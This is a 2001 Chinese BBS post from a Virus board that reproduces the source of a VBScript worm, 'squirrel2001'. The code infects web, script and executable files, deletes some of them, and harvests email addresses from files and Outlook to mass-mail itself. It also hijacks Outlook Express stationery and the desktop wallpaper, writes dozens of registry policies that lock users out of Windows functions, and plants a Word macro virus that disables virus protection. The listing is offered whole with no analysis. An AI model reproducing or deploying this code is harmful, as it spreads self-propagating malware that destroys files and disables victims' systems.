荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: fast (平淡), 信区: Virus
标 题: 脚本病毒和宏病毒及PE可执行病毒的大结合
发信站: 荔园晨风BBS站 (Wed Sep 19 18:12:47 2001), 转信
------------------------------------------------------------------------
--------
作者:ATM 郭宏硕
------------------squirrel2001.
vbs----------------------------------------------------------------
On Error Resume Next
Set igalgbinffy= Createobject("scripting.filesystemobject")
Set rfqwdudwylf = CreateObject("WScript.Shell")
main
sub main()
On Error Resume Next
Dim known
Set known = CreateObject("WScript.shell")
If known.RegRead("HKEY_CURREN_USER\Squirrels2001", "devil29880") <>
"die" Then
macrovirus
ircvirus
mload
else
mload
end sub
Sub mload()
On Error Resume Next
mPath = Grf()
Set Os = CreateObject("Scriptlet.TypeLib")
Set Oh = CreateObject("Shell.Application")
If IsHTML Then
mURL = LCase(document.Location)
If mPath = "" Then
Os.Reset
Os.Path = "C:\squirrel2001.htm"
Os.Doc = Lhtml()
Os.Write()
Ihtml = "<span style='position:absolute'><Iframe src='C:\Help.htm'
width='0' height='0'></Iframe></span>"
Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
Else
If Iv(mPath, "squirrel2001.vbs") Then
setInterval "Rt()", 10000
Else
m = "hta"
If LCase(m) = Right(mURL, Len(m)) Then
id = setTimeout("mclose()", 1)
main
Else
Os.Reset()
Os.Path = mPath & "\" & "squirrel2001.hta"
Os.Doc = Lhtml()
Os.write()
Iv mPath, "squirrel2001.hta"
End If
End If
End If
Else
virusmain
End If
End Sub
Sub virusmain()
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
Set Od = CreateObject("Scripting.Dictionary")
Od.Add "html", "1100"
Od.Add "vbs", "0100"
Od.Add "htm", "1100"
Od.Add "asp", "0010"
Ks = "HKEY_CURRENT_USER\Software\"
Ds = Grf()
Cs = Gsf()
If IsVbs Then
If Of.FileExists("C:\squirrel2001.htm") Then
Of.DeleteFile ("C:\squirrel2001.htm")
End If
Key = CInt(Month(Date) + Day(Date))
If Key = 10 Then
Od.RemoveAll
Od.Add "exe", "0001"
Od.Add "dll", "0001"
End If
if month(date)=9 then
if day(date)=4 then
joke
end if
end if
Cn = Rg(Ks & "Help\Count")
If Cn = "" Then
Cn = 1
End If
Rw Ks & "Help\Count", Cn + 1
f1 = Rg(Ks & "Help\FileName")
f2 = FNext(Of, Od, f1)
fext = GetExt(Of, Od, f2)
Rw Ks & "Help\FileName", f2
If IsDel(fext) Then
f3 = f2
f2 = FNext(Of, Od, f2)
Rw Ks & "Help\FileName", f2
Of.DeleteFile f3
Else
If LCase(WScript.ScriptFullname) <> LCase(f2) Then
Fw Of, f2, fext
End If
End If
If (CInt(Cn) Mod 366) = 0 Then
If (CInt(Second(Time)) Mod 2) = 0 Then
Tsend
Else
adds = Og
Msend (adds)
End If
End If
wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
If Rg(Ks & "Help\wallPaper") <> wp Or wp = "" Then
If wp = "" Then
n1 = ""
n3 = Cs & "\squirrel2001.htm"
Else
mP = Of.GetFile(wp).ParentFolder
n1 = Of.GetFileName(wp)
n2 = Of.GetBaseName(wp)
n3 = Cs & "\" & n2 & ".htm"
End If
Set pfc = Of.CreateTextFile(n3, True)
mt = Sa("1100")
pfc.Write "<" & "HTML><" & "body bgcolor='#007f7f' background='" & n1
& "'><" & "/Body><" & "/HTML>" & mt
pfc.Close
Rw Ks & "Help\wallPaper", n3
Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3
End If
Else
Set fc = Of.CreateTextFile(Ds & "\squirrel2001.vbs", True)
fc.Write Sa("0100")
fc.Close
bf = Cs & "\Untitled.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
Set fc2 = Of.CreateTextFile(bf, True)
fc2.Write Lhtml
fc2.Close
oeid = Rg("HKEY_CURRENT_USER\Identities\Default User ID")
oe = "HKEY_CURRENT_USER\Identities\" & oeid &
"\Software\Microsoft\Outlook Express\5.0\Mail"
MSH = oe & "\Message Send HTML"
CUS = oe & "\Compose Use Stationery"
SN = oe & "\Stationery Name"
Rw MSH, 1
Rw CUS, 1
Rw SN, bf
Web = Cs & "\WEB"
Set gf = Of.GetFolder(Web).Files
Od.Add "htt", "1100"
For Each m In gf
fext = GetExt(Of, Od, m)
If fext <> "" Then
Fw Of, m, fext
End If
Next
End If
End Sub
Sub mclose()
document.Write "<" & "title>我爱你张一!</title" & ">"
window.Close
End Sub
Sub Rt()
Dim mPath
On Error Resume Next
mPath = Grf()
Iv mPath, "squirrel2001.vbs"
End Sub
Function Sa(n)
Dim VBSText, m
VBSText = Lvbs()
If Mid(n, 3, 1) = 1 Then
m = "<%" & VBSText & "%>"
End If
If Mid(n, 2, 1) = 1 Then
m = VBSText
End If
If Mid(n, 1, 1) = 1 Then
m = Lscript(m)
End If
Sa = m & vbCrLf
End Function
Sub Fw(Of, S, n)
Dim fc, fc2, m, mmail, mt
On Error Resume Next
Set fc = Of.OpenTextFile(S, 1)
mt = fc.ReadAll
fc.Close
If Not Sc(mt) Then
mmail = Ml(mt)
mt = Sa(n)
Set fc2 = Of.OpenTextFile(S, 8)
fc2.Write mt
fc2.Close
Msend (mmail)
End If
End Sub
Function Sc(S)
mN = "Rem 我爱你张一"
If InStr(S, mN) > 0 Then
Sc = True
Else
Sc = False
End If
End Function
Function FNext(Of, Od, S)
Dim fpath, fname, fext, T, gf
On Error Resume Next
fname = ""
T = False
If Of.FileExists(S) Then
fpath = Of.GetFile(S).ParentFolder
fname = S
ElseIf Of.FolderExists(S) Then
fpath = S
T = True
Else
fpath = Dnext(Of, "")
End If
Do While True
Set gf = Of.GetFolder(fpath).Files
For Each m In gf
If T Then
If GetExt(Of, Od, m) <> "" Then
FNext = m
Exit Function
End If
ElseIf LCase(m) = LCase(fname) Or fname = "" Then
T = True
End If
Next
fpath = Pnext(Of, fpath)
Loop
End Function
Function Pnext(Of, S)
On Error Resume Next
Dim Ppath, Npath, gp, pn, T, m
T = False
If Of.FolderExists(S) Then
Set gp = Of.GetFolder(S).SubFolders
pn = gp.Count
If pn = 0 Then
Ppath = LCase(S)
Npath = LCase(Of.GetParentFolderName(S))
T = True
Else
Npath = LCase(S)
End If
Do While Not Er
For Each pn In Of.GetFolder(Npath).SubFolders
If T Then
If Ppath = LCase(pn) Then
T = False
End If
Else
Pnext = LCase(pn)
Exit Function
End If
Next
T = True
Ppath = LCase(Npath)
Npath = Of.GetParentFolderName(Npath)
If Of.GetFolder(Ppath).IsRootFolder Then
m = Of.GetDriveName(Ppath)
Pnext = Dnext(Of, m)
Exit Function
End If
Loop
End If
End Function
Function Dnext(Of, S)
Dim dc, n, d, T, m
On Error Resume Next
T = False
m = ""
Set dc = Of.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
If T Then
Dnext = d
Exit Function
Else
If LCase(S) = LCase(d) Then
T = True
End If
If m = "" Then
m = d
End If
End If
End If
Next
Dnext = m
End Function
Function GetExt(Of, Od, S)
Dim fext
On Error Resume Next
fext = LCase(Of.GetExtensionName(S))
GetExt = Od.Item(fext)
End Function
Sub Rw(k, v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
R.RegWrite k, v
End Sub
Function Rg(v)
Dim R
On Error Resume Next
Set R = CreateObject("WScript.Shell")
Rg = R.RegRead(v)
End Function
Function IsVbs()
Dim ErrTest
On Error Resume Next
ErrTest = WScript.ScriptFullname
If Err Then
IsVbs = False
Else
IsVbs = True
End If
End Function
Function IsHTML()
Dim ErrTest
On Error Resume Next
ErrTest = document.Location
If Er Then
IsHTML = False
Else
IsHTML = True
End If
End Function
Function IsMail(S)
Dim m1, m2
IsMail = False
If InStr(S, vbCrLf) = 0 Then
m1 = InStr(S, "@")
m2 = InStr(S, ".")
If m1 <> 0 And m1 < m2 Then
IsMail = True
End If
End If
End Function
Function Lvbs()
Dim f, m, ws, Of
On Error Resume Next
If IsVbs Then
Set Of = CreateObject("Scripting.FileSystemObject")
Set f = Of.OpenTextFile(WScript.ScriptFullname, 1)
Lvbs = f.ReadAll
Else
For Each ws In document.scripts
If LCase(ws.Language) = "vbscript" Then
If Sc(ws.Text) Then
Lvbs = ws.Text
Exit Function
End If
End If
Next
End If
End Function
Function Iv(mPath, mName)
Dim Shell
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
Shell.NameSpace(mPath).Items.Item(mName).InvokeVerb
If Er Then
Iv = False
Else
Iv = True
End If
End Function
Function Grf()
Dim Shell, mPath
On Error Resume Next
Set Shell = CreateObject("Shell.Application")
mPath = "C:\"
For Each mShell In Shell.NameSpace(mPath).Items
If mShell.IsFolder Then
Grf = mShell.Path
Exit Function
End If
Next
If Er Then
Grf = ""
End If
End Function
Function Gsf()
Dim Of, m
On Error Resume Next
Set Of = CreateObject("Scripting.FileSystemObject")
m = Of.GetSpecialFolder(0)
If Er Then
Gsf = "C:\"
Else
Gsf = m
End If
End Function
Function Lhtml()
Lhtml = "<" & "HTML" & "><HEAD" & ">" & vbCrLf & _
"<" & "Title> Help </Title" & "><" & "/HEAD>" & vbCrLf & _
"<" & "Body> " & Lscript(Lvbs()) & vbCrLf & _
"<" & "/Body></HTML" & ">"
End Function
Function Lscript(S)
Lscript = "<" & "script language='VBScript'>" & vbCrLf & _
S & "<" & "/script" & ">"
End Function
Function Sl(S1, S2, n)
Dim l1, l2, l3, i
l1 = Len(S1)
l2 = Len(S2)
i = InStr(S1, S2)
If i > 0 Then
l3 = i + l2 - 1
If n = 0 Then
Sl = Left(S1, i - 1)
ElseIf n = 1 Then
Sl = Right(S1, l1 - l3)
End If
Else
Sl = ""
End If
End Function
Function Ml(S)
Dim S1, S3, S2, T, adds, m
S1 = S
S3 = """"
adds = ""
S2 = S3 & "mailto" & ":"
T = True
Do While T
S1 = Sl(S1, S2, 1)
If S1 = "" Then
T = False
Else
m = Sl(S1, S3, 0)
If IsMail(m) Then
adds = adds & m & vbCrLf
End If
End If
Loop
Ml = Split(adds, vbCrLf)
End Function
Function Og()
Dim i, n, m(), Om, Oo
Set Oo = CreateObject("Outlook.Application")
Set Om = Oo.GetNamespace("MAPI").GetDefaultFolder(10).Items
n = Om.Count
ReDim m(n)
For i = 1 To n
m(i - 1) = Om.Item(i).Email1Address
Next
Og = m
End Function
Sub Tsend()
Dim Od, MS, MM, a, m
Set Od = CreateObject("Scripting.Dictionary")
MConnect MS, MM
MM.FetchSorted = True
MM.Fetch
For i = 0 To MM.MsgCount - 1
MM.MsgIndex = i
a = MM.MsgOrigAddress
If Od.Item(a) = "" Then
Od.Item(a) = MM.MsgSubject
End If
Next
For Each m In Od.Keys
MM.Compose
MM.MsgSubject = "Fw: " & Od.Item(m)
MM.RecipAddress = m
MM.AttachmentPathName = Gsf & "\Untitled.txt.
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
MM.Send
Next
MS.SignOff
End Sub
Function MConnect(MS, MM)
Dim U
On Error Resume Next
Set MS = CreateObject("MSMAPI.MAPISession")
Set MM = CreateObject("MSMAPI.MAPIMessages")
U = Rg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging
Subsystem\Profiles\DefaultProfile")
MS.UserName = U
MS.DownLoadMail = False
MS.NewSession = False
MS.LogonUI = True
MS.SignOn
MM.SessionID = MS.SessionID
End Function
Sub Msend(Address)
Dim MS, MM, i, a
MConnect MS, MM
i = 0
MM.Compose
For Each a In Address
If IsMail(a) Then
MM.RecipIndex = i
MM.RecipAddress = a
i = i + 1
End If
Next
MM.MsgSubject = " Help "
MM.AttachmentPathName = Gsf & "\Untitled.txt.
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
MM.Send
MS.SignOff
End Sub
Function Er()
If Err.Number = 0 Then
Er = False
Else
Err.Clear
Er = True
End If
End Function
Function IsDel(S)
If Mid(S, 4, 1) = 1 Then
IsDel = True
Else
IsDel = False
End If
End Function
sub joke()
dim snow
set snow=CreateObject("WScript.Shell")
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoFind",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoRun",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoLogOff",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoClose",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoSetFolders",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoStartBanner",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoSetTaskbar",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoFolderOptions",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoSetActiveDescktop",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoViewContextMenu",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoDevMgrPage",1,"REG_DWORD
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoConfigPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoFileSysPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoVirtMemPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoDispCPL",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoDispBackgroundPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoDispscrsavPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoDispAppearancePage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoDispSettingsPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoSecCPL",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoPwdPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoAdminPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\System\NoProfilePage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\ActiveDesktop\NoComponents",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\ActiveDesktop\NoAddingComponents",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\ActiveDesktop\NoDeletingComponents",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\ActiveDesktop\NoEditingComponents",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\ActiveDesktop\NoClosingComponents",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Network\NoNetSetup",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Network\NoNetSetupIDPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Network\NoNetSetupSecurityPage",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Network\NoFileSharingControl",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Network\NoEntireNetwork",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Network\NoWorkgroupContents",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoPrinters",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoAddPrinter",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoDeletePrinter",1,"REG_DWORD"
snow.
regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Poli
cies\Explorer\NoPrinterTab",1,"REG_DWORD"
snow.
regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Wi
nlogon\LegalNoticeCaption","I MISS YOU"
snow.
regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Wi
nlogon\LegalNoticeText","难道真是昨夜星辰昨夜风,此情可待成追忆了吗?一切
都仿佛发生在昨天!你好吗?我只是想知道你还好吗。"
snow.
regwrite"hkey_local_machine\system\currentcontrolset\services\i8042prt\p
rameters\crashonctrlscroll","1234"
snow.sendkeys"^{scolllock}{scolllock}"
dim loveme,fso
set fso=createobject("Scripting.FileSystemObject")
set loveme=fso.createtextfile("%windir%\lovelyddletter.txt",true)
loveme.writeline"忆自学校三摩,获亲尘诲,别后山川间隔,时序频迁."
loveme.writeline"尘封往事,历历在目,提起笔,却无从写起。。。"
loveme.writeline"轻轻推窗而望,夜人静,唯有晚风摇动一树相思。。。"
loveme.writeline"其实,感情的某些片刻,并不比精心设计小说情节逊色。
loveme.writeline"从认识你的那一天开始,我的世界便开始了漫长的等待,为一
种没有结束的等待而等待。"
loveme.writeline"然而,注定我们都是流浪的心"
loveme.writeline"注定我们都没有相交的轨迹"
loveme.writeline"我奔你而来 在灿烂的星河中"
loveme.writeline"寻找你的星座"
loveme.writeline"追踪你的声音"
loveme.writeline"我气喘吁吁却心甘情愿做一抹色彩"
loveme.writeline"涂上你的生命"
loveme.writeline"让我面目全非的芳龄真诚而坦白"
loveme.writeline"我想不出你风尘仆仆的模样"
loveme.writeline"想不出的黑夜里 你会乘哪一叶孤帆而至"
loveme.writeline"那疲倦的身影是风浪雕塑的男人"
loveme.writeline"潇洒的黑发漂拂着你坎坷的经历"
loveme.writeline"我愿永远站在这命运的立交桥上"
loveme.writeline"作无约无期的等待"
loveme.writeline"在纵横交错的手纹里"
loveme.writeline"找出同向你的路口"
loveme.writeline"这一切 都满含着我的心愿"
loveme.writeline"我因此而孤立无援"
loveme.writeline"我不在乎我凄凉的等待"
loveme.writeline"除了你 我别无选择"
loveme.writeline"除了你我不会跨入那道栅栏"
loveme.writeline"我会是风雪中那棵固执的寒梅"
loveme.writeline"看你遥遥无期 而我依然守着冬天"
loveme.writeline"然而,现实是那样残酷。"
loveme.writeline"我可以忘却一个名字,"
loveme.writeline"却忘却不了一种情感,"
loveme.writeline"你的偶然的光亮,照彻了我久久等待后的枉然。"
loveme.writeline"我的淡淡的忧伤,因你的照耀而升起一圈光轮"
loveme.writeline"不认识你多好,既无痛苦也无烦恼,认识你更好,宁可痛苦也
宁可烦恼。"
loveme.writeline"既然你要让火山沉默,那就让它沉默,"
loveme.writeline"但沉默并不是死亡,"
loveme.writeline"我知道,这不过是等待下一次喷发。。。"
loveme.writeline"如果你不爱我,愿上帝祝福你,如果你爱我,让上帝一千倍祝
福你"
loveme.writeline"让我们好聚好散,彼此道一声珍重。"
loveme.writeline"如果有一天,我们不再挥霍所拥有的一切,不再为所失去的惋
惜,那我们就学会了珍惜,"
loveme.writeline"但一切都太晚了。"
loveme.writeline"聚也不是开始,散也不是结束。"
loveme.writeline"然而,我们今天只能说:"
loveme.writeline"无法拒绝的是开始"
loveme.writeline"无法抗拒的是结束"
loveme.writeline"你我之间是该结束了。"
loveme.writeline"大约在冬天,我得走远,"
loveme.writeline"丧失我,像火舌吞过的原始森林,"
loveme.writeline"留下烧焦的空气给你,"
loveme.writeline"所有的们都从原来的地方迁走,你也没了钥匙。"
loveme.writeline"幸亏时间可以改变一切。"
loveme.writeline"任何痛苦和欢乐都可以在时间的推移中找到最后的归宿,任何
难题和疑虑也都可以在岁月的流逝中得到圆满的答案。"
loveme.writeline"看完信,也许你就在也见不到我了,想见我一面道一声珍重的
机会好象也没有了。"
loveme.writeline"再次伫立窗前,却发现岁月匆匆,昔日那生动的梦境竟如残叶
在心中的湖泊中飘零。"
loveme.writeline"无名瀑独斟你的名字,"
loveme.writeline"酿千年的烈酒品你的名字,"
loveme.writeline"我抚摩着你的名字流泪。。。"
loveme.writeline"署名:一方无法融化你的孤傲的天空 : ATM (郭宏硕 即日)"
loveme.close
set loveme=nothing
snow.run"%windir%\notepad.exe lovelyddletter.txt"
end sub
sub macrovirus()
dim viruscaurse,macroset,nt,ntt
set macroset=createobject("word.Application")
Set NT = macroset.NormalTemplate.VBProject.vbcomponents(1).CodeModule
If NT.Lines(1, 1) <> "'<!--Squirrel-->" Then
NT.DeleteLines 1, NT.CountofLines
NT.InsertLines "'<!--Squirrel-->"
NT.InsertLines "Private Sub Document_Open()"
NT.InsertLines "On Error Resume Next"
NT.InsertLines "Dim file$"
NT.InsertLines "Dim ans$"
NT.InsertLines "Dim test"
NT.InsertLines "Dim mItem"
NT.InsertLines "Dim cItem"
NT.InsertLines "Dim aDoc"
NT.InsertLines "Dim aTemp"
NT.InsertLines "Dim vset"
NT.InsertLines "Dim Iset"
NT.InsertLines "Dim ads"
NT.InsertLines "Options.VirusProtection = False"
NT.InsertLines "Options.ConfirmConversions = False"
NT.InsertLines "Options.SaveNormalPrompt = False"
NT.InsertLines "Application.ShowVisualBasicEditor = False"
NT.InsertLines "If System.PrivateProfileString('',
'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\word\security',
'level') <> '' Then"
NT.InsertLines "CommandBars('Macro').Controls('Security...').Enabled =
False"
NT.InsertLines "System.PrivateProfileString('',
'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\word\security',
'level') = 1&"
NT.InsertLines "Else"
NT.InsertLines "CommmandBars('Tools').Controls('Macro...').Enabled =
False"
NT.InsertLines "Options.ConfirmConversions = (1 - 1): Options.
VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines "End If"
NT.InsertLines "For Each mItem In CommandBars('Tools').Controls"
NT.InsertLines " If mItem.Caption = '自定义(C)...' Then"
NT.InsertLines " mItem.OnAction = 'AutoClose'"
NT.InsertLines " End If"
NT.InsertLines " If mItem.Caption = '模板和加载(I)...' Then"
NT.InsertLines " mItem.OnAction = 'AutoClose'"
NT.InsertLines " End If"
NT.InsertLines " If mItem.Caption = '选项(O)...' Then"
NT.InsertLines " mItem.OnAction = 'AutoClose'"
NT.InsertLines " End If"
NT.InsertLines "Next mItem"
NT.InsertLines "For Each cItem In CommandBars('Tools').Controls"
NT.InsertLines " If cItem.Type = msoControlPopup Then"
NT.InsertLines " If cItem.Caption = '宏(M)' Then"
NT.InsertLines " For Each mItem In cItem.CommandBars.Controls"
NT.InsertLines " If mItem.Caption = '宏(M)...' Then"
NT.InsertLines " mItem.OnAction = 'AutoClose'"
NT.InsertLines " End If"
NT.InsertLines " If mItem.Caption = 'Visual Basci 编辑器(V)' Then"
NT.InsertLines " mItem.OnAction = 'AutoClose'"
NT.InsertLines " End If"
NT.InsertLines " Next mItem"
NT.InsertLines " End If"
NT.InsertLines " End If"
NT.InsertLines "Next cItem"
NT.InsertLines "For Each cItem In CommandBars('Visual Basic').
Controls"
NT.InsertLines "cItem.OnAction = 'AutoClose'"
NT.InsertLines "Next cItem"
NT.InsertLines "For Each cItem In CommandBars"
NT.InsertLines "If cItem.Visible = True Then"
;屏蔽按钮自定义
NT.InsertLines "cItem.Protection = msoBarNoCustomize"
NT.InsertLines "End If"
NT.InsertLines "Next cItem"
NT.InsertLines "If ads.Name = 'Autoexec.dot' Then"
看看autoexec.dot是否加载
NT.InsertLines "ads.Installed = False"
NT.InsertLines "End If"
NT.InsertLines "Next ads"
NT.InsertLines "With Dialogs(wdDialogToolsOptionsFileLocations)"
NT.InsertLines ".Path = 'STARTUP-PATH'"
NT.InsertLines ".Setting = 'c:\'"
NT.InsertLines ".Execute"
把起始目录指向C:\ 以便加载autoexec.dot
NT.InsertLines "End With"
NT.InsertLines "file$ = WordBasic.[MacroFileName$]()"
NT.InsertLines "If InStr(file$, 'Autoexec') <> 0 Then"
NT.InsertLines "For Each aDoc In Documents"
NT.InsertLines "For Each cItem In aDoc.VBProject.VBComponents"
NT.InsertLines "If (cItem.Name = 'Squirrel') Then"
NT.InsertLines "vset = 1"
NT.InsertLines "End If"
NT.InsertLines "Next cItem"
NT.InsertLines "Next aDoc"
NT.InsertLines "For Each cItem In NormalTemplate.VBProject.VBComponents"
该查Normal模板了
NT.InsertLines "If (cItem.Name = 'Squirrel') Then"
NT.InsertLines "vset = 1"
NT.InsertLines "End If"
NT.InsertLines "Next cItem"
NT.InsertLines "If vset <> 1 Then"
NT.InsertLines "WordBasic.DisableAutoMacros"
准备感染,关掉自动宏选项
NT.InsertLines "Documents.Open FileName:='C:\Autoexec.dot',
AddToRecentFiles:=False"
NT.InsertLines "For Each aDoc In Documents"
NT.InsertLines "If (InStr(aDoc.FullName, Application.PathSeparator) <>
0) And (aDoc.VBProject.Protection = 0) Then"
NT.InsertLines "WordBasic.MacroCopy ActiveDocument.FullName + ':
Squirrel', aDoc.FullName + ':Squirrel'"
创建C:\autoexec.dot模板,并将病毒复制过去
NT.InsertLines "End If"
NT.InsertLines "Next aDoc"
NT.InsertLines "For Each aTemp In Templates"
NT.InsertLines "If (InStr(aTemp.FullName, Application.PathSeparator)
<> 0) And (aTemp.VBProject.Protection = 0) Then"
NT.InsertLines "WordBasic.MacroCopy ActiveDocument.FullName + ':
Squirrel', aTemp.FullName + ':Squirrel'"
NT.InsertLines "End If"
NT.InsertLines "Next aTemp"
NT.InsertLines "ActiveDocument.Save"
NT.InsertLines "ActiveDocument.Close"
NT.InsertLines "End If"
NT.InsertLines "If vset = 1 Then"
NT.InsertLines "GoTo out"
NT.InsertLines "End If"
NT.InsertLines "End If"
NT.InsertLines "With Application.FileSearch"
如果打开的文件不是autoexec.dot ,则自己找
NT.InsertLines ".LookIn = 'C:\'"
NT.InsertLines ".FileName = 'Autoexec.dot'"
NT.InsertLines "If .Execute > 0 Then"
NT.InsertLines "Iset = 1"
NT.InsertLines "End If"
NT.InsertLines "End With"
NT.InsertLines "If Iset <> 1 Then"
NT.InsertLines "WordBasic.DisableAutoMacros"
NT.InsertLines "Documents.Add NewTemplate:=True"
NT.InsertLines "WordBasic.MacroCopy file$ + ':Squirrel',
ActiveDocument.FullName + ':Squirrel'"
NT.InsertLines "ActiveDocument.SaveAs FileName:='c:\Autoexec.dot',
AddToRecentFiles:=False"
NT.InsertLines "ActiveDocument.Close"
NT.InsertLines "End If"
NT.InsertLines "For Each aDoc In Documents"
NT.InsertLines "If (file$ <> aDoc.FullName) And (aDoc.VBProject.
Protection = 0) Then"
NT.InsertLines "For Each cItem In aDoc.VBProject.VBComponents"
NT.InsertLines "If (cItem.Name = 'AutoOpen') Or (cItem.Name = 'AutoNew')
Or (cItem.Name = 'AutoClose') Or (cItem.Name = 'FileSave') Then "
NT.InsertLines "aDoc.VBProject.VBComponents.Remove (cItem)"
NT.InsertLines "End If"
NT.InsertLines "Next cItem"
NT.InsertLines "End If"
NT.InsertLines "Next aDoc"
NT.InsertLines "For Each aTemp In Templates"
NT.InsertLines "If (file$ <> aTemp.FullName) And (aTemp.VBProject.
Protection = 0) Then"
NT.InsertLines "For Each cItem In aTemp.VBProject.VBComponents"
NT.InsertLines "If (cItem.Name = 'AutoOpen') Or (cItem.Name = 'AutoNew')
Or (cItem.Name = 'AutoClose') Or (cItem.Name = 'FileSave') Then"
NT.InsertLines "aTemp.VBProject.VBComponents.Remove (cItem)"
